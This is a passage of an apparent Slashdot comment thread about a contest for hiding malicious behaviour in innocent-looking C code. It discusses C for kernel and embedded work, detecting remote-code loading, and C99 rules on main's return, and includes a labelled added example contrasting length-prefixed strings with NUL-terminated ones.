      Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds? And how exactly is Python, LISP, or any other interpreted/dynamic runtime compiled language going to be used to write a task scheduler or memory management system worthy of being used in an OS kernel or embedded MCUs with barely 16KiB RAM?

      I think you're quite bitter about having to use C for writing applications, which I can perfectly understand. As for what C is actually MEANT for, it does the job quite well. And yes, the preprocessor issues suck, and it would be nice to have Pascal strings, but there really is no alternative to C that I have seen for low-level programming. It makes computer science purists who think everyone should program in Haskell or LISP feel dirty, but it does the job very well. It sure beats writing directly in ASM.
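
Added example, not part of any comment in this thread: the trade-off argued in the replies above, with a hypothetical length-prefixed type (`lstr`, `LSTR_MAX` and all helper names are assumptions) next to the NUL-terminated view of the same constructed bytes. The two views disagree as soon as the data contains an embedded `'\0'`.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical length-prefixed string type: length byte first, then raw bytes. */
#define LSTR_MAX 31
typedef struct {
    unsigned char len;      /* number of valid bytes in data[] */
    char data[LSTR_MAX];    /* not NUL-terminated; may contain '\0' */
} lstr;

/* Store n bytes. Returns 0 on success, -1 if they do not fit. */
int lstr_set(lstr *s, const char *bytes, size_t n) {
    if (n > LSTR_MAX)
        return -1;          /* the length is explicit, so the bound is checked */
    memcpy(s->data, bytes, n);
    s->len = (unsigned char)n;
    return 0;
}

/* Equality over the stored length: every byte counts, including '\0'. */
int lstr_equal(const lstr *s, const char *bytes, size_t n) {
    return (size_t)s->len == n && memcmp(s->data, bytes, n) == 0;
}

/* Constructed sample input: 9 bytes with a NUL in the middle. */
static const char sample[9] = { 'r','o','o','t','\0','u','s','e','r' };

/* Copy the sample into buf and terminate it so <string.h> calls stay in bounds. */
static const char *as_cstr(char *buf) {
    memcpy(buf, sample, sizeof sample);
    buf[sizeof sample] = '\0';
    return buf;
}

/* C-string view: strlen and strcmp stop at the first '\0'. */
size_t cstr_len(void)  { char b[sizeof sample + 1]; return strlen(as_cstr(b)); }
int cstr_is_root(void) { char b[sizeof sample + 1]; return strcmp(as_cstr(b), "root") == 0; }

/* Length-prefixed view of the same bytes. */
size_t lstr_len(void)  { lstr s; return lstr_set(&s, sample, sizeof sample) ? 0 : s.len; }
int lstr_is_root(void) { lstr s; lstr_set(&s, sample, sizeof sample); return lstr_equal(&s, "root", 4); }
int lstr_rejects_long(void) { lstr s; char big[LSTR_MAX + 1] = {0}; return lstr_set(&s, big, sizeof big) == -1; }

int main(void) {
    printf("C string: len=%zu is_root=%d\nlstr:     len=%zu is_root=%d\n",
           cstr_len(), cstr_is_root(), lstr_len(), lstr_is_root());
    return 0;
}
```

The cost the replies point at is visible too: every `lstr` operation has to carry and check the length, where the C-string routines simply walk bytes until the terminator.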

  43. Service Pack fixes it, but it's documented by edalytical · · Score: 4, Informative
    --
    Win a signed Stephen Carpenter ESP Guitar from the Deftones: http://def-tag.com/?r=0008781
  44. I think this is more appropriate by btarval · · Score: 2, Funny
    Almost. All it takes is a one-line change to make this malicious program into what should be the motto of this contest:

    main() { printf("Goodbye World!\n"); }

    --
    The best way to predict the future is to create it. - Peter Drucker.
  45. Re:So are you very, very good or very, very bad? by anno1602 · · Score: 2, Insightful

    Writing code of that quality that looks like it does what it's supposed to do, while actually doing something subtly different, sounds like a very difficult challenge to me.

    Programmers do that every day. It's called a "bug". Now, doing something subtly different and controlling what the subtly different thing actually is, that is a challenge.

  46. Vectors by headkase · · Score: 2, Informative

    Any program that was able to do two things would pass: The ability to load remote information into memory and to begin execution of the loaded information.
    A way to automatically find this would be to use an execution tracer that would alert you when the program's point of execution "left" its source code or allowed system APIs.

    --
    Shh.
  47. Comment removed by account_deleted · · Score: 2, Insightful

    Comment removed based on user account deletion

  48. Re:What are the legal ramifications of this? by Genrou · · Score: 2, Interesting

    Not the same paranoia of the previous post, but paranoia anyway. But the first thing that I thought was something like: "oh, so, this contest will show that malicious code can be inserted in open source and it will be very difficult to spot?" -- there is at least one software company that will like to point to it. Then again, I might actually be paranoid.

  49. Volunteer to help out! by real+gumby · · Score: 2, Interesting

    Clearly most of us should be submitting innocuous code to help camouflage the actual malign entries. That will make it harder for the judges to find badness. If you know that all the entries have some badness, then you'll look really hard. If you don't know which ones do, your checking gets worse.

    This would make the test more like the real world too.

  50. Re:I'll take the bait by Dwonis · · Score: 2, Informative
    Finally, AFAICR C doesn't support the implicit return at the end of main that C++ does, so there's a missing return statement. (I may be wrong about the third one if it was fixed in C99; I don't have a copy of the revised standard handy.)

    You are correct. This is from ISO/IEC 9899:1999(E):

    5.1.2.2.3 Program termination
    1 If the return type of the main function is a type compatible with int, a return from the initial call to the main function is equivalent to calling the exit function with the value returned by the main function as its argument; reaching the } that terminates the main function returns a value of 0. If the return type is not compatible with int, the termination status returned to the host environment is unspecified.
    (emphasis added)